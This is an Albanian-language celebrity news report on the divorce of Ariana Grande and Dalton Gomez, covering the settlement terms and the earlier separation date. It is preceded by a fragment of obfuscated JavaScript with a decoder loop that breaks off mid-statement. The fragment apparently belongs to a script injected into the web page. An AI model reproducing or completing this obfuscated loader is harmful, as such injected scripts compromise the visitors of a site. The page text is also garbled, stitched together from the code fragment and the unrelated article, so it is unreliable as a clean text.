;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ariana Grande dhe Dalton Gomez i japin fund martesës përfundimisht

By

Ariana Grande është divorcuar me Dalton Gomez.

Këngëtarja dhe ndërmjetësi i pasurive të patundshme, janë shkurorëzuar më 6 tetor.

Dalton do të përfitojë 1,179 milion dollarë dhe gjysmën e të ardhurave neto të shitjes së shtëpisë së tyre në Los Angelos, por nuk do të mbledhë asnjë mbështetje bashkëshortore.

Edhe pse çifti bëri kërkesë për divorc vetëm tre javë më parë, ata në fakt u ndanë gjashtë muaj më parë, me dokumentet e tyre ligjore që shënojnë datën e ndarjes si 20 shkurt 2023, raporton E news, transmeton Klankosova.tv.

“Ata kanë qenë vërtet të kujdesshëm dhe respektues për njëri-tjetrin në çdo hap të këtij procesi. Ka qenë një proces ndarjeje shumë i sjellshëm dhe i durueshëm”, tha një burim.

Ndarja e tyre u mbajt e fshehtë për muaj të tërë dhe në fakt Ariana dhe Dalton festuan përvjetorin e dytë të martesës në maj siç u pa në rrjetet sociale.

Artikuj të ngjashëm